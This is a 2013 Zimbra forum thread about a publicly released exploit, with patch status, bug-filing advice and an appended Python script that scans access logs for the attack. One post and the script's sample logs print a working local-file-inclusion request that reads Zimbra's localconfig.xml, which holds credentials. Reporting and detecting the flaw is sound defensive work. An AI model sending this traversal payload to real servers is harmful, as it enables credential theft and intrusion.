zimbra 0-day

maumar
Outstanding Member
Posts: 378
Joined: Fri Sep 12, 2014 10:28 pm

zimbra 0-day

Postby maumar » Sat Dec 07, 2013 10:47 am

It was published on Exploits Database by Offensive Security. I suppose you are aware of it; in that case, sorry.


phoenix
Ambassador
Posts: 26573
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Sat Dec 07, 2013 10:53 am

> maumar wrote: It was published on Exploits Database by Offensive Security. I suppose you are aware of it; in that case, sorry.

Please file this in bugzilla.
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
MKC
Posts: 26
Joined: Sat Sep 13, 2014 1:49 am

zimbra 0-day

Postby MKC » Sat Dec 07, 2013 5:29 pm

If anybody's interested, I've analyzed the bug and developed an independent fix for it.

I've posted everything on my blog, which sadly is in French.
I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me :)
quanah
Zimbra Alumni
Posts: 1668
Joined: Fri Sep 12, 2014 10:33 pm

zimbra 0-day

Postby quanah » Sat Dec 07, 2013 10:02 pm

Hi,
Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.
--Quanah
--
Quanah Gibson-Mount
Product Architect, Symas http://www.symas.com/
OpenLDAP Core team http://www.openldap.org/project/
MKC
Posts: 26
Joined: Sat Sep 13, 2014 1:49 am

zimbra 0-day

Postby MKC » Sun Dec 08, 2013 10:14 am

The exploit was advertised as a 0day, and I took the author's word for it.

I feel silly now, sorry about this!
dik23
Outstanding Member
Posts: 264
Joined: Sat Sep 13, 2014 1:44 am

zimbra 0-day

Postby dik23 » Sun Dec 08, 2013 5:59 pm

Better a false alarm than no alarm
anndro
Posts: 2
Joined: Sat Sep 13, 2014 3:27 am

zimbra 0-day

Postby anndro » Mon Dec 09, 2013 1:30 pm

I updated my Zimbra to 8.0.5 but the exploit is still working. Here is a quick fix for protection, in Turkish, but I think it can help:
http://www.bilgiguvenligi.gov.tr/kritik-acikliklar/zimbra-e-posta-sunucusu-acil-aciklik.html
phoenix
Ambassador
Posts: 26573
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Tue Dec 10, 2013 1:17 am

> anndro wrote: I updated my Zimbra to 8.0.5 but the exploit is still working. Here is a quick fix for protection, in Turkish, but I think it can help:

If you think this exploit still exists then file a report in bugzilla.
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
dik23
Outstanding Member
Posts: 264
Joined: Sat Sep 13, 2014 1:44 am

zimbra 0-day

Postby dik23 » Tue Dec 10, 2013 4:19 am

Please could you post the bug here so I can subscribe to it?
Thanks
expert_az
Posts: 29
Joined: Fri Sep 12, 2014 11:13 pm

zimbra 0-day

Postby expert_az » Tue Dec 10, 2013 4:23 am

I can confirm, LFI working on last 8.0.5 and after 7.2.2.
The LFI is located at:

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
http://www.exploit-db.com/exploits/30085/
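A defender-side check for the pattern quoted above, added here as an example that is not from the thread or from Zimbra: it scans constructed Apache-style access-log lines for requests under /res/ whose query values decode to a directory traversal (`../`) or a NUL byte (`%00`), decoding twice so a double-encoded variant is not missed. The log lines, the `scan_access_log` function and its helpers are my own and assume Python 3.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (common log format); not taken from the thread.
# Line 2 mirrors the traversal shape quoted above, line 3 is a double-encoded variant.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2013:04:23:11 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 5120
203.0.113.9 - - [10/Dec/2013:04:23:19 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 2048
203.0.113.9 - - [10/Dec/2013:04:23:25 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?skin=..%252F..%252Fetc%252Fpasswd%2500 HTTP/1.1" 404 512
198.51.100.7 - - [10/Dec/2013:04:24:02 +0000] "GET /zimbra/?skin=harmony HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_param(raw: str) -> str:
    """Percent-decode a query value twice so a double-encoded ../ or %00 is not missed."""
    return unquote(unquote(raw))

def is_traversal(value: str) -> bool:
    """True if the decoded value walks up the directory tree or carries a NUL byte."""
    return "../" in value or "..\\" in value or "\x00" in value

def scan_access_log(text: str, path_prefix: str = "/res/") -> list:
    """Return one record per request under path_prefix whose query holds a traversal-looking value.
    A hit with HTTP 200 means the server answered the request and deserves the first look."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than guess
        parts = urlsplit(m["target"])
        if not parts.path.startswith(path_prefix):
            continue
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            value = decode_param(raw)
            if is_traversal(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                             "value": value, "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f"{h['ip']} {h['ts']} {h['param']}={h['value']!r} -> HTTP {h['status']}")
```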
